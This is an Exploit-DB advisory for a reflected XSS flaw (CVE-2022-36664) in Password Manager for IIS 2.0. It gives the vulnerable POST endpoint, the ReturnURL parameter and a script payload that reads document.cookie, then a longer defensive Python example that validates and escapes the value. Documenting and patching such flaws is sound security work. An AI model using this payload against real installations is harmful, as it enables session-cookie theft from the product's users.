[webapps] Password Manager for IIS v2.0 - XSS
2023-3-25 08:0:0 Author: www.exploit-db.com

# Exploit Title: Password Manager for IIS v2.0 - XSS
# Exploit Author: VP4TR10T
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
# Software Link: http://passwordmanager.adiscon.com/
# Version: 2.0
# Tested on: WINDOWS
# CVE : CVE-2022-36664


Affected URI (when changing user password):
POST /isapi/PasswordManager.dll HTTP/1.1

Affected Parameter in HTTP payload:
ReturnURL=<script>alert(document.cookie)</script>

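A defensive handling of the `ReturnURL` field, as an added example that is not from the advisory or the vendor. It assumes the value ends up in an HTML link (the advisory does not say where it is reflected); `safe_return_url`, `render_return_link`, the allowlisted host and the fallback `/` are hypothetical.

```python
import html
from urllib.parse import parse_qs, urlsplit

ALLOWED_HOSTS = {"intranet.example.com"}  # constructed sample allowlist
DEFAULT_RETURN = "/"                      # assumed fallback target


def safe_return_url(raw: str) -> str:
    """Return raw only if it is a same-site path or an allowlisted
    http(s) URL; otherwise return the fallback."""
    # Markup characters, quotes, backslashes, spaces and control characters
    # have no place in a return target, so reject them outright.
    if not raw or any(c in "<>\"'\\" or ord(c) <= 0x20 for c in raw):
        return DEFAULT_RETURN
    try:
        parts = urlsplit(raw)
    except ValueError:  # malformed authority, e.g. unbalanced brackets
        return DEFAULT_RETURN
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept absolute paths only. A leading "//"
        # (or "///") is resolved by browsers as another host.
        if raw.startswith("/") and not raw.startswith("//"):
            return raw
        return DEFAULT_RETURN
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return raw
    return DEFAULT_RETURN  # javascript:, data:, //other-host, unknown hosts


def render_return_link(form_body: str) -> str:
    """Parse a form-encoded POST body and build the link back to ReturnURL."""
    fields = parse_qs(form_body, keep_blank_values=True)
    raw = fields.get("ReturnURL", [""])[0]
    target = safe_return_url(raw)
    # Encode for the HTML attribute context even after validation, so that
    # characters such as "&" in a legitimate URL cannot alter the markup.
    return '<a href="{}">Return</a>'.format(html.escape(target, quote=True))


if __name__ == "__main__":
    # Constructed request bodies: the advisory's payload and a benign value.
    for body in ("ReturnURL=<script>alert(document.cookie)</script>",
                 "ReturnURL=%2Fportal%2Fhome%3Ftab%3D1%26x%3D2"):
        print(render_return_link(body))
```

Validation and output encoding are applied together: validation limits where the user can be sent, and encoding keeps any accepted value inert in the page.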
            

Source: https://www.exploit-db.com/exploits/51055